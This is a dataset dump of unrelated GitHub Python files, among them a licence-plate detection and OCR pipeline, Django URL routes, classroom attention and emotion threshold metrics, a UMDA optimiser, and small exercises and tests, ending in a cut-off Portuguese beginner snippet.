FILE.parents[0]\nif str(ROOT) not in sys.path:\n sys.path.append(str(ROOT))\nROOT = Path(os.path.relpath(ROOT, Path.cwd()))\n\n######################################\n# Create \"logs\" folders to save images and csv\n######################################\n\nLOGS_FOLDER = \"./logs/\"\nPath(LOGS_FOLDER).mkdir(exist_ok=True)\n\n\ndef get_today_paths():\n today = date.today().strftime(\"%Y-%m-%d\")\n\n folder = Path(f\"{LOGS_FOLDER}/{today}/\")\n folder.mkdir(exist_ok=True)\n\n image_folder_path = folder / f\"licenses {today}\"\n image_folder_path.mkdir(exist_ok=True)\n\n csv_filename = folder / f\"{today}.csv\"\n\n return csv_filename, image_folder_path\n\n\nCSV_PATH, IMAGE_FOLDER_PATH = get_today_paths()\n\n\n######################################\n# main()\n######################################\n\nVID_FORMATS = \"mp4\", \"mkv\", \"mpg\", \"mpeg\", \"mov\", \"gif\"\nIMG_FORMATS = (\"bmp\", \"dng\", \"jpeg\", \"jpg\", \"mpo\", \"png\", \"tif\", \"tiff\", \"webp\", \"pfm\")\n\n\ndef save_license_car_plate(plate_crop, plate_text):\n unique_image_name = f\"{uuid1()}.jpg\"\n\n imwrite(os.path.join(IMAGE_FOLDER_PATH, unique_image_name), plate_crop)\n\n with open(CSV_PATH, mode=\"a\", newline=\"\", encoding=\"utf-8\") as csv_file:\n csv_writer = csv.writer(\n csv_file, delimiter=\" \", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n )\n csv_writer.writerow([unique_image_name, plate_text])\n\n\ndef video_pipeline(source, imgsz, model, reader):\n time = datetime.now()\n print(f\"\\n\\t2. Detection and recognition started (image size {imgsz})\\n\")\n\n capture = VideoCapture(source)\n\n fps = capture.get(CAP_PROP_FPS)\n frames = int(capture.get(CAP_PROP_FRAME_COUNT))\n duration = frames / fps\n\n frame_count = 0\n while capture.isOpened():\n ok, frame = capture.read()\n if not ok:\n print(\"Video is full processed\")\n break\n\n time_for_one_frame = datetime.now()\n frame_count += 1\n\n plate_crop = detect_plate(frame, imgsz, model)\n if plate_crop is None:\n print(\n f\"Frame №{frame_count}, {datetime.now() - time_for_one_frame} no detections\"\n )\n continue\n\n plate_text = recognize_text_with_easyocr(plate_crop, reader)\n if plate_text == \"\" or len(plate_text) < 6:\n print(\n f\"Frame №{frame_count}, {datetime.now() - time_for_one_frame} the number wasn't recognized, or car plate is too small\"\n )\n continue\n\n save_license_car_plate(plate_crop, plate_text)\n\n print(\n f'Frame №{frame_count}, {datetime.now() - time_for_one_frame} \"{plate_text}\"'\n )\n print(\n f\"\\n\\tDetection and recognition finished!\\n\\tVideo duration: {duration} seconds\\n\\tElapsed {datetime.now() - time} for car plate detection, recognition and saving\"\n )\n\n\ndef image_pipeline(source, imgsz, model, reader):\n image = imread(source)\n\n plate_crop = detect_plate(image, imgsz, model)\n if plate_crop is None:\n return \"\"\n else:\n return recognize_text_with_easyocr(plate_crop, reader)\n\n\ndef test_pipeline(imgsz, model, reader):\n import json\n\n with open(f\"{ROOT}/test/dataset.json\", \"r\", encoding=\"utf-8\") as labels_file:\n test_labels = json.load(labels_file)[\"labels\"]\n\n all_images = len(test_labels)\n\n right_preditctions = 0\n for label in test_labels:\n label_text = label[\"nums\"][0][\"text\"]\n label_file = f'{ROOT}/test/images/{label[\"file\"]}'\n\n pred_text = image_pipeline(label_file, imgsz, model, reader)\n\n print(f\"{label_text}, {pred_text.upper()}\")\n\n if label_text == pred_text.upper():\n right_preditctions += 1\n\n precision = right_preditctions / all_images\n print(f\"Точность: {precision}\")\n\n return precision\n\n\ndef main(\n source=f\"{ROOT}/data/sample.mp4\",\n weights=f\"{ROOT}/models/y5m_baseline.pt\",\n imgsz=640,\n):\n is_video = Path(source).suffix[1:] in VID_FORMATS\n is_image = Path(source).suffix[1:] in IMG_FORMATS\n is_test = Path(source).exists and (source == \"test\")\n\n if not is_video and not is_image and not is_test:\n print(\n f\"[--source N] Expected VIDEO, IMAGE file or 'test' ('test' folder should exist), but got {source}\"\n )\n return\n\n print(\"\\n\\t1. Downloading models ...\\n\")\n\n model = torch.hub.load(\n \"ultralytics/yolov5\", \"custom\", path=weights, trust_repo=True\n )\n\n reader = Reader([\"ru\"])\n\n print(\"\\n\\tDownload - success!\")\n\n if is_video and Path(source).is_file():\n video_pipeline(source, imgsz, model, reader)\n\n if is_image and Path(source).is_file():\n number = image_pipeline(source, imgsz, model, reader)\n print(f'\\n\\t{source} -> license car number: \"{number}\"')\n\n if is_test:\n # python main.py --weights .\\models\\y5s6.pt --source test --img 1280\n test_pipeline(imgsz, model, reader)\n\n # is_url =\n # TODO()\n print(\"\\n\\tExit ...\")\n return \"zxc\"\n\n\ndef parse_opt():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--weights\",\n type=str,\n default=f\"{ROOT}/models/y5m_baseline.pt\",\n help=\"Trained model *.pt\",\n )\n parser.add_argument(\n \"--source\",\n type=str,\n default=f\"{ROOT}/data/sample.mp4\",\n help=\"Source file (video) or link (stream)\",\n )\n parser.add_argument(\n \"--imgsz\",\n \"--imgs\",\n \"--img\",\n \"--img-size\",\n type=int,\n default=640,\n help=\"inference size h,w\",\n )\n opt = parser.parse_args()\n return opt\n\n\nif __name__ == \"__main__\":\n opt = parse_opt()\n main(**vars(opt))\n","repo_name":"azatnv/deep-learning-module","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23331619020","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import UserViewSet\nfrom tweets.views import TweetViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'tweets', TweetViewSet)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include(router.urls)),\n path('api/v1/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/v1/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('api/v1/users/', include('users.urls')),\n path('api/v1/tweets/', include('tweets.urls')),\n]\n","repo_name":"adensoares/minitwitter-api","sub_path":"minitwitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23739869558","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\napp_name='posts'\n\nurlpatterns = [\n path('', views.postList, name=\"postList\"),\n # path('createPost////', views.createPost, name=\"createPost\"),\n path('postCreation/', views.createPost, name=\"postCreation\"),\n path('postUpdate//', views.updatePost, name=\"postUpdate\"),\n path('postDelete//', views.deletePost, name=\"postDelete\"),\n]","repo_name":"Nodiryps/npe_asbl_webApp","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38153812293","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport Config\nimport math\nimport Logger\nimport numpy as np\n\nclass MetricUtil(object):\n \"\"\"docsTry for MetricUtil\"\"\"\n def __init__(self):\n super(MetricUtil, self).__init__()\n self.__logger = Logger.Logger(__name__)\n self.__MINVALUE = -2147483648 # The min value of INT.\n self.__MAXVALUE = 2147483647 # The max value of INT\n\n def get_min_value(self):\n\n return self.__MINVALUE\n\n def get_max_value(self):\n\n return self.__MAXVALUE\n\n def threshold_index(self, index):\n\n if index <= 0:\n return 0\n\n return index - 1\n\n def DynamicThreshold(self, data, percentage = 0.2, multi_fact = 5, is_upper = True):\n '''\n Method: Average_Value + multi_fact * Standard Deviation\n percentage: 去掉高低各该百分比的数据,默认值是20%\n is_upper: True将返回上界阈值,False将返回下界阈值\n '''\n if not is_upper:\n multi_fact = -1 * multi_fact\n\n deleteNumber = int(math.floor(len(data) * percentage))\n deleteNumber = 1 if deleteNumber == 0 else deleteNumber # 避免deleteNumber等于0\n self.__logger.debug(\"DeleteNumber: \" + str(deleteNumber))\n calc_data = data[deleteNumber:-deleteNumber]\n if len(calc_data) != 0:\n result = math.floor(np.mean(calc_data) + multi_fact * np.std(calc_data, ddof=0))\n if np.isnan(result):\n result = self.__MINVALUE if is_upper else self.__MAXVALUE\n else:\n result = self.__MINVALUE if is_upper else self.__MAXVALUE\n\n return result\n\n def calculate_study_threshold(self, data):\n ''''''\n normals = []\n arounds = []\n lows = []\n for key, value in data.items():\n if 'face_pose_normal' in value:\n normals.append(value['face_pose_normal'])\n if 'face_pose_around' in value:\n arounds.append(value['face_pose_around'])\n if 'face_pose_low' in value:\n lows.append(value['face_pose_low'])\n\n normal_len = len(normals)\n thresholds = {}\n if normal_len != 0:\n normals.sort(reverse=True)\n self.__logger.debug(str(normals))\n # 不佳\n thresholds['study_bad'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_BAD['FACE_POSE_NORMAL'])))]\n # 非常好\n thresholds['study_great'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_GREAT['FACE_POSE_NORMAL'])))]\n # 良好\n thresholds['study_good'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_GOOD['FACE_POSE_NORMAL'])))]\n\n arounds_len = len(arounds)\n if arounds_len != 0:\n arounds.sort(reverse=True)\n self.__logger.debug(str(arounds))\n thresholds['study_bad_around'] = arounds[self.threshold_index(int(math.floor(arounds_len * Config.STUDY_THREHOLD_BAD['FACE_POSE_AROUND'])))]\n thresholds['study_bad_around_count'] = self.DynamicThreshold(arounds, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n lows_len = len(lows)\n if lows_len != 0:\n lows.sort(reverse=True)\n self.__logger.debug(str(lows))\n thresholds['study_bad_low'] = lows[self.threshold_index(int(math.floor(lows_len * Config.STUDY_THREHOLD_BAD['FACE_POSE_LOW'])))]\n thresholds['study_bad_low_count'] = self.DynamicThreshold(lows, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Study Thresholds: \" + str(thresholds))\n\n return thresholds\n\n def calculate_emotion_threshold(self, data):\n ''''''\n res_happy = []\n res_low = []\n for key, value in data.items():\n if 'emotion_happy' in value:\n res_happy.append(value['emotion_happy'])\n if 'emotion_low' in value:\n res_low.append(value['emotion_low'])\n\n thresholds = {}\n if len(res_low) != 0:\n # 低落\n res_low.sort(reverse=True)\n self.__logger.debug(str(res_low))\n thresholds['emotion_low'] = res_low[self.threshold_index(int(math.floor(len(res_low) * Config.EMOTION_THRESHOLD_LOW['SAD_RATIO'])))]\n thresholds['emotion_low_count'] =self.DynamicThreshold(res_low, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(res_happy) != 0:\n # 开心\n res_happy.sort(reverse=True)\n self.__logger.debug(str(res_happy))\n thresholds['emotion_happy'] = res_happy[self.threshold_index(int(math.floor(len(res_happy) * Config.EMOTION_THRESHOLD_HAPPY['SMILE_RATIO'])))]\n thresholds['emotion_happy_count'] = self.DynamicThreshold(res_happy, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Emotion threshold: \" + str(thresholds))\n return thresholds\n\n def calculate_mental_threshold(self, data):\n body_stat_sttk = []\n body_stat_pztk = []\n body_stat_standup = []\n body_stat_handup = []\n for key, value in data.items():\n if 'body_stat_sttk' in value:\n body_stat_sttk.append(value['body_stat_sttk'])\n if 'body_stat_pztk' in value:\n body_stat_pztk.append(value['body_stat_pztk'])\n if 'body_stat_standup' in value:\n body_stat_standup.append(value['body_stat_standup'])\n if 'body_stat_handup' in value:\n body_stat_handup.append(value['body_stat_handup'])\n\n thresholds = {}\n if len(body_stat_sttk) != 0:\n # 手托头听课\n body_stat_sttk.sort(reverse=True)\n self.__logger.debug(str(body_stat_sttk))\n thresholds['body_stat_sttk_count'] = self.DynamicThreshold(body_stat_sttk, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_pztk) != 0:\n # 趴着听课\n body_stat_pztk.sort(reverse=True)\n self.__logger.debug(str(body_stat_pztk))\n thresholds['body_stat_pztk_count'] = self.DynamicThreshold(body_stat_pztk, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_standup) != 0:\n # 站立\n body_stat_standup.sort(reverse=True)\n self.__logger.debug(str(body_stat_standup))\n thresholds['body_stat_standup_count'] = self.DynamicThreshold(body_stat_standup, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_handup) != 0:\n # 举手\n body_stat_handup.sort(reverse=True)\n self.__logger.debug(str(body_stat_handup))\n thresholds['body_stat_handup_count'] = self.DynamicThreshold(body_stat_handup, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Emotion threshold: \" + str(thresholds))\n return thresholds\n\n def estimate_study_stat(self, mentals, face_poses, thresholds):\n ''''''\n self.__logger.debug(\"Mentals: \" + str(mentals))\n self.__logger.debug(\"Face_pose: \" + str(face_poses))\n self.__logger.debug(\"Thresholds: \" + str(thresholds))\n\n total = 0.0\n if 'face_pose_normal' in face_poses:\n total += face_poses['face_pose_normal']\n if 'face_pose_around' in face_poses:\n total += face_poses['face_pose_around']\n if 'face_pose_low' in face_poses:\n total += face_poses['face_pose_low']\n\n if ('student_mental_stat' in mentals and (mentals['student_mental_stat'] == Config.STUDY_THREHOLD_BAD['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_bad' in thresholds and (face_poses['face_pose_normal'] <= thresholds['study_bad'])) \\\n or ('face_pose_around' in face_poses and 'study_bad_around' in thresholds and (face_poses['face_pose_around'] >= thresholds['study_bad_around']) and (face_poses['face_pose_around'] >= thresholds['study_bad_around_count']) and (face_poses['face_pose_around'] / total >= Config.STUDY_THREHOLD_BAD['FACE_POSE_AROUND_FEQ']))\\\n or ('face_pose_low' in face_poses and 'study_bad_low' in thresholds and (face_poses['face_pose_low'] >= thresholds['study_bad_low']) and (face_poses['face_pose_low'] >= thresholds['study_bad_low_count']) and (face_poses['face_pose_low'] / total >= Config.STUDY_THREHOLD_BAD['FACE_POSE_LOW_FEQ'])): # 学习状态 -- 不佳\n return 3\n elif 'student_mental_stat' in mentals and (mentals['student_mental_stat'] == Config.STUDY_THREHOLD_GREAT['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_great' in thresholds and (face_poses['face_pose_normal'] >= thresholds['study_great']) and (face_poses['face_pose_normal'] / total >= Config.STUDY_THREHOLD_GREAT['FACE_POSE_NORMAL_FEQ']): # 学习状态 -- 非常好\n return 0\n elif 'student_mental_stat' in mentals and (mentals['student_mental_stat'] in Config.STUDY_THREHOLD_GOOD['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_good' in thresholds and (face_poses['face_pose_normal'] >= thresholds['study_good']) and (face_poses['face_pose_normal'] / total >= Config.STUDY_THREHOLD_GOOD['FACE_POSE_NORMAL_FEQ']): # 学习状态 -- 良好\n return 1\n else: # 学习状态 -- 正常\n return 2\n\n def estimate_mental_stat(self, emotions, body_stats, thresholds):\n ''''''\n self.__logger.debug(\"Emotion: \" + str(emotions))\n self.__logger.debug(\"Body_Stat: \" + str(body_stats))\n\n total = 0.0\n mental_tired_cnt = 0.0\n mental_positive_cnt = 0.0\n if 'body_stat_normal' in body_stats:\n total += body_stats['body_stat_normal']\n if 'body_stat_standup' in body_stats:\n total += body_stats['body_stat_standup']\n mental_positive_cnt += body_stats['body_stat_standup']\n if 'body_stat_handup' in body_stats:\n total += body_stats['body_stat_handup']\n mental_positive_cnt += body_stats['body_stat_handup']\n if 'body_stat_sleep' in body_stats:\n total += body_stats['body_stat_sleep']\n if 'body_stat_sttk' in body_stats:\n total += body_stats['body_stat_sttk']\n mental_tired_cnt += body_stats['body_stat_sttk']\n if 'body_stat_pztk' in body_stats:\n total += body_stats['body_stat_pztk']\n mental_tired_cnt += body_stats['body_stat_pztk']\n\n if ('student_emotion' in emotions and emotions['student_emotion'] == Config.MENTAL_THRESHOLD_TIRED['EMOTION_STATUS']) \\\n and (mental_tired_cnt / total >= Config.MENTAL_THRESHOLD_TIRED['BODY_STAT']) and (('body_stat_sttk' in body_stats and body_stats['body_stat_sttk'] >= thresholds['body_stat_sttk_count']) or ('body_stat_pztk' in body_stats and body_stats['body_stat_pztk'] >= thresholds['body_stat_pztk_count'])): # 精神状态 -- 疲惫\n return 2\n elif ('student_emotion' in emotions and emotions['student_emotion'] == Config.MENTAL_THRESHOLD_POSITIVE['EMOTION_STATUS']) \\\n and (mental_positive_cnt / total >= Config.MENTAL_THRESHOLD_POSITIVE['BODY_STAT']) and (('body_stat_standup' in body_stats and body_stats['body_stat_standup'] >= thresholds['body_stat_standup_count']) or ('body_stat_handup' in body_stats and body_stats['body_stat_handup'] >= thresholds['body_stat_handup_count'])): # 精神状态 -- 积极\n return 0\n else: # 正常\n return 1\n\n def estimate_emotion(self, emotions, thresholds):\n ''''''\n self.__logger.debug(\"Emotions: \" + str(emotions))\n self.__logger.debug(\"Thresholds: \" + str(thresholds))\n\n total = 0.0\n if 'emotion_low' in emotions:\n total += emotions['emotion_low']\n if 'emotion_happy' in emotions:\n total += emotions['emotion_happy']\n if 'emotion_normal' in emotions:\n total += emotions['emotion_normal']\n\n if 'emotion_low' in emotions and 'emotion_low' in thresholds and (emotions['emotion_low'] / total >= Config.EMOTION_THRESHOLD_LOW['SAD_FREQUENCY']) and (emotions['emotion_low'] >= thresholds['emotion_low']) and (emotions['emotion_low'] >= thresholds['emotion_low_count']): # 情绪 -- 低落\n return 2\n elif 'emotion_happy' in emotions and 'emotion_happy' in thresholds and (emotions['emotion_happy'] / total >= Config.EMOTION_THRESHOLD_HAPPY['SMILE_FREQUENCY']) and (emotions['emotion_happy'] >= thresholds['emotion_happy']) and (emotions['emotion_happy'] >= thresholds['emotion_happy_count']): # 情绪 -- 开心\n return 0\n else: # 情绪 -- 正常\n return 1","repo_name":"stuMental/DataModel","sub_path":"MetricUtil.py","file_name":"MetricUtil.py","file_ext":"py","file_size_in_byte":12752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13290984201","text":"from under100.day65 import test\n\n\n# https://edabit.com/challenge/zqMREZ2MQd9M5jNfM\ndef is_symmetrical(a_num):\n a_str = str(a_num)\n return a_str == a_str[::-1]\n\n\n# https://edabit.com/challenge/9TcXrWEGH3DaCgPBs\ndef find_odd(a_list):\n for i in a_list:\n if a_list.count(i) % 2:\n return i\n\n\ndef test_suite():\n test(is_symmetrical(7227))\n test(not is_symmetrical(12567))\n test(is_symmetrical(44444444))\n test(not is_symmetrical(9939))\n test(is_symmetrical(1112111))\n test(find_odd([1, 1, 2, -2, 5, 2, 4, 4, -1, -2, 5]) == -1)\n test(find_odd([20, 1, 1, 2, 2, 3, 3, 5, 5, 4, 20, 4, 5]) == 5)\n test(find_odd([10]) == 10)\n\n\nif __name__ == '__main__':\n test_suite()\n","repo_name":"markvogel/100days","sub_path":"2019/day127.py","file_name":"day127.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23295653868","text":"\"\"\"\nTests for functions to maintain the artificial postcode table.\n\"\"\"\n\nimport pytest\n\nfrom nominatim.tools import postcodes\n\n@pytest.fixture\ndef postcode_table(temp_db_with_extensions, temp_db_cursor, table_factory,\n placex_table, word_table):\n table_factory('location_postcode',\n \"\"\" place_id BIGINT,\n parent_place_id BIGINT,\n rank_search SMALLINT,\n rank_address SMALLINT,\n indexed_status SMALLINT,\n indexed_date TIMESTAMP,\n country_code varchar(2),\n postcode TEXT,\n geometry GEOMETRY(Geometry, 4326)\"\"\")\n temp_db_cursor.execute('CREATE SEQUENCE seq_place')\n temp_db_cursor.execute(\"\"\"CREATE OR REPLACE FUNCTION getorcreate_postcode_id(postcode TEXT)\n RETURNS INTEGER AS $$ BEGIN RETURN 1; END; $$ LANGUAGE plpgsql;\n \"\"\")\n\n\ndef test_import_postcodes_empty(dsn, temp_db_cursor, postcode_table, tmp_path):\n postcodes.import_postcodes(dsn, tmp_path)\n\n assert temp_db_cursor.table_exists('gb_postcode')\n assert temp_db_cursor.table_exists('us_postcode')\n assert temp_db_cursor.table_rows('location_postcode') == 0\n\n\ndef test_import_postcodes_from_placex(dsn, temp_db_cursor, postcode_table, tmp_path):\n temp_db_cursor.execute(\"\"\"\n INSERT INTO placex (place_id, country_code, address, geometry)\n VALUES (1, 'xx', '\"postcode\"=>\"9486\"', 'SRID=4326;POINT(10 12)')\n \"\"\")\n\n postcodes.import_postcodes(dsn, tmp_path)\n\n rows = temp_db_cursor.row_set(\"\"\" SELECT postcode, country_code,\n ST_X(geometry), ST_Y(geometry)\n FROM location_postcode\"\"\")\n print(rows)\n assert len(rows) == 1\n assert rows == set((('9486', 'xx', 10, 12), ))\n\n","repo_name":"pepe-invest-git/Nominatim","sub_path":"test/python/test_tools_postcodes.py","file_name":"test_tools_postcodes.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"29534081199","text":"import sys\nimport os\n\n\nuse_emoji = os.environ.get(\"use_emoji\", \"False\") == \"True\"\n\nif not use_emoji:\n face = \" =]\"\n thinking = \"THK\"\n eating = \"EAT\"\n fork_icon = \"Y\"\nelse:\n face = \"😀\"\n thinking = \"🤔\"\n eating = \"😖\"\n fork_icon = \"🍴\"\n\nphilosophers = [\n \"nothing\",\n \"nothing\",\n \"nothing\",\n \"nothing\",\n \"nothing\"\n]\n\nphilosopher_mapping = {\n \"nothing\": face,\n \"eating\": eating,\n \"thinking\": thinking\n}\n\nfork_mapping = {\n True: fork_icon,\n False: \" \"\n}\n\nforks = [\n True,\n True,\n True,\n True,\n True,\n]\n\n\ndef get_table():\n fork_display = [fork_mapping[fork] for fork in forks]\n phi_mapping = [philosopher_mapping[i] for i in philosophers]\n return \" \".join(\" \".join(_) for _ in zip(fork_display, phi_mapping)) + \" \"\n\n\ndef ui(ui_queue):\n while True:\n ui_change = ui_queue.get()\n status_change, index, change = ui_change\n if status_change:\n philosophers[index] = change\n sys.stdout.write(\"\\r\")\n sys.stdout.write(get_table())\n sys.stdout.flush()\n else:\n forks[index] = change\n","repo_name":"andychase/classwork","sub_path":"os2/concurrency_1/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"386376383","text":"\"\"\"\r\n--- Middle value ---\r\nWrite a function, middle_value, that takes in the head of a linked list as an argument. The function should return the value of the middle node in the linked list. If the linked list has an even number of nodes, then return the value of the second middle node.\r\n\r\nYou may assume that the input list is non-empty.\r\n\"\"\"\r\nimport unittest\r\n\r\n\r\nclass Node:\r\n def __init__(self, val):\r\n self.val = val\r\n self.next = None\r\n\r\n\r\ndef middle_value(head: Node):\r\n slow = head\r\n fast = head\r\n\r\n while fast is not None and fast.next is not None:\r\n fast = fast.next.next\r\n slow = slow.next\r\n\r\n return slow.val\r\n\r\n\r\nclass Test(unittest.TestCase):\r\n def test_00(self):\r\n a = Node('a')\r\n b = Node('b')\r\n c = Node('c')\r\n d = Node('d')\r\n e = Node('e')\r\n\r\n a.next = b\r\n b.next = c\r\n c.next = d\r\n d.next = e\r\n\r\n # a -> b -> c -> d -> e\r\n assert middle_value(a) == 'c'\r\n\r\n def test_01(self):\r\n a = Node('a')\r\n b = Node('b')\r\n c = Node('c')\r\n d = Node('d')\r\n e = Node('e')\r\n f = Node('f')\r\n\r\n a.next = b\r\n b.next = c\r\n c.next = d\r\n d.next = e\r\n e.next = f\r\n\r\n # a -> b -> c -> d -> e -> f\r\n assert middle_value(a) == 'd'\r\n\r\n def test_02(self):\r\n x = Node('x')\r\n y = Node('y')\r\n z = Node('z')\r\n\r\n x.next = y\r\n y.next = z\r\n\r\n # x -> y -> z\r\n assert middle_value(x) == 'y'\r\n\r\n def test_03(self):\r\n x = Node('x')\r\n y = Node('y')\r\n\r\n x.next = y\r\n\r\n # x -> y\r\n assert middle_value(x) == 'y'\r\n\r\n def test_04(self):\r\n q = Node('q')\r\n\r\n # q\r\n assert middle_value(q) == 'q'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"siimveske/structy.net","sub_path":"9. Mixed Recall/103_middle_value.py","file_name":"103_middle_value.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40003117282","text":"import sys\nimport pandas as pd\nimport numpy as np\n\nprogram = sys.argv[0]\nnewtable = sys.argv[1]\ntablename = sys.argv[2]\nmode = sys.argv[3]\ntable = pd.read_csv(tablename)\n\ndef handle_nan_zero(df):\n\tdf = df.fillna(0)\n\treturn df\n\t\ndef handle_nan_median(df):\n\tdf = df.fillna(df.median())\n\treturn df\n\t\ndef handle_nan_mean(df):\n\tdf = df.fillna(df.mean())\n\treturn df\n\t\ndef handle_nan_delete(df):\n\tdf = df.dropna()\n\treturn df\n\ndef handle_nan_mode(df):\n\tdf = df.fillna(df.mode().ix[0])\n\treturn df\n\t\ndef get_prefix(program):\n\tsplitted = program.split(\"/\")\n\tpy = splitted[len(splitted)-1].split(\".py\");\n\tprefix = py[0]+\"_\"\n\treturn prefix\n\ndef get_newfile_name(tablename):\n\tnewfilename = get_prefix(program)+get_tablename(tablename)\n\treturn newfilename\n\t\ndef get_newfile_path(tablename):\n\tpath = tablename[:len(tablename)-len(get_tablename(tablename))]\n\treturn path\n\t\ndef get_tablename(tablename):\n\tsplitted = tablename.split(\"/\")\n\treturn splitted[len(splitted)-1]\n\t\nnewtablename = get_newfile_path(tablename) + get_newfile_name(tablename)\n\nif mode == \"zero\":\n\ttable_out = handle_nan_zero(table)\nif mode == \"mean\":\n\ttable_out = handle_nan_mean(table)\nif mode == \"median\":\n\ttable_out = handle_nan_median(table)\nif mode == \"del\":\n\ttable_out = handle_nan_delete(table)\nif mode == \"modusz\":\n\ttable_out = handle_nan_mode(table)\n\t\nif newtable == \"true\":\n\ttable_out.to_csv(newtablename, index=False)\nelse:\n\ttable_out.to_csv(tablename, index=False)\n\t\n\n","repo_name":"gyenesada/javaProject","sub_path":"python_codes/nanvalues.py","file_name":"nanvalues.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14453793188","text":"import numpy as np\n\nclass UMDA:\n class Solution:\n def __init__(self, bitstring, fitness) -> None:\n self.bitstring = bitstring\n self.fitness = fitness\n\n def __init__(self, fitness_function, validation_function, num_generations, population_size, parent_size, offspring_size) -> None:\n self.num_generations = num_generations\n self.fitness_function = fitness_function\n self.validation_function = validation_function\n self.offspring_size = offspring_size\n self.parent_size = parent_size\n self.population_size = population_size\n\n def generate_single_solution(self, item_probability_vector, nr_of_items) -> Solution:\n bitstring = []\n for i in range(nr_of_items):\n if np.random.rand() <= item_probability_vector[i] and self.validation_function(bitstring):\n bitstring.append(1)\n else:\n bitstring.append(0)\n \n return self.Solution(bitstring, self.fitness_function(bitstring))\n\n def generate_random_population(self, nr_of_items):\n uniform_dist = [0.5 for _ in range(nr_of_items)]\n return [self.generate_single_solution(uniform_dist, nr_of_items) for _ in range(self.population_size)]\n\n def calculate_distribution(self, parents, nr_of_features):\n univariate_freqs = [0 for _ in range(nr_of_features)]\n\n for solution in parents:\n for index1 in range(len(solution.bitstring)):\n item1 = solution.bitstring[index1]\n if item1 == 1:\n univariate_freqs[index1] += 1\n\n for index in range(len(univariate_freqs)):\n univariate_freqs[index] /= self.parent_size\n \n\n return univariate_freqs\n\n\n def generate_new_individual(self, univariate_freqs):\n individual = [0 for _ in univariate_freqs]\n\n counter = 0\n for chance in univariate_freqs:\n if np.random.rand() <= chance:\n individual[counter] = 1 \n else:\n individual[counter] = 0 \n counter += 1\n\n return individual\n\n def parent_selection(self, population):\n population.sort(key=lambda x: x.fitness, reverse=True)\n return population[:self.parent_size]\n\n def generate_offspring(self, univariate_freqs):\n offspring = []\n for _ in range(self.offspring_size):\n while True:\n new_individual = self.generate_new_individual(univariate_freqs)\n individual_fitness = self.fitness_function(new_individual)\n if (self.validation_function(new_individual)):\n offspring.append(self.Solution(new_individual, individual_fitness))\n break\n\n return offspring\n\n def calculate(self, nr_of_features):\n population = self.generate_random_population(nr_of_features)\n best_results = []\n for generation in range(self.num_generations):\n parents = self.parent_selection(population)\n univariate_dist = self.calculate_distribution(parents, nr_of_features)\n offspring = self.generate_offspring(univariate_dist)\n population += offspring\n population.sort(key=lambda x: x.fitness, reverse=True)\n population = population[:self.population_size]\n best_results.append(population[0])\n\n return best_results","repo_name":"dominikcondric/EDA-algorithms","sub_path":"algorithms/umda.py","file_name":"umda.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"827003696","text":"num=int(input(\"Digite um número: \")) #Usuário informa o número \r\n\r\nif num > 0: #Verifica se o número é maior que 0 \r\n print(\"O número digitado é Positivo.\") #Se maior que 0, ele é positivo\r\nelse:\r\n if num == 0: #Verifica se ele é igual a 0\r\n print(\"O número digitado não é nem positivo e nem negativo, ele é 0.\") #Se igual a 0, mostrar que ele não é nem positivo e nem negativo, mas sim 0\r\n else: #Se 